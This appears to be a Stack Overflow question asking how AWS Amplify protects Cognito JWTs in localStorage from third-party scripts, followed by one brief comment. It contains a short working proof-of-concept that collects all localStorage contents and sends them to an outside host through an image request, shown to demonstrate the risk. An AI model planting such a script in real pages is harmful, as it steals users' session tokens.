# With AWS Amplify, what prevents third party JavaScripts from stealing my JWTs?

Tags: javascript, jwt, amazon-cognito, aws-amplify

I'm working through the [aws-samples/aws-amplify-vue](https://github.com/aws-samples/aws-amplify-vue) sample that uses [aws/aws-amplify](https://github.com/aws/aws-amplify).  I'm trying to understand how [JWT](https://jwt.io/) is used with [Cognito](https://aws.amazon.com/cognito/) for authentication and I don't understand how the JWTs I receive after authentication are protected from being exfiltrated and used by any of the third party JavaScript libraries I might be using.

I cloned the example and followed the instructions to get it set up.  Then I modified `index.html` to include an extra `<script>`:

```
<script src="https://example.com/list-localstorage.js"></script>
```

Then I host `list-localstorage.js` on `example.com`.  The contents are:

```
// Ref: https://stackoverflow.com/a/28306101/624726
var allStorage = Object.keys(localStorage).reduce(function(obj, str) { 
  obj[str] = localStorage.getItem(str); 
  return obj
}, {});

// Ref: https://stackoverflow.com/a/5049668/624726
(new Image).src = 'https://example.net/log-storage?' + JSON.stringify(allStorage);
```

When I watch the access logs for `example.net`, I see my JWTs getting logged.  I was able to verify the signature on the `id` and `access` tokens.

Would those be usable to access protected content?  What are they doing to prevent (ex:) a malicious JavaScript ad from reading all the data in `localStorage` and stealing, using my JWTs?

Comment: Nothing. That's why you need to *trust* any third-party libraries that you include in your page. And if you don't, you shouldn't use it.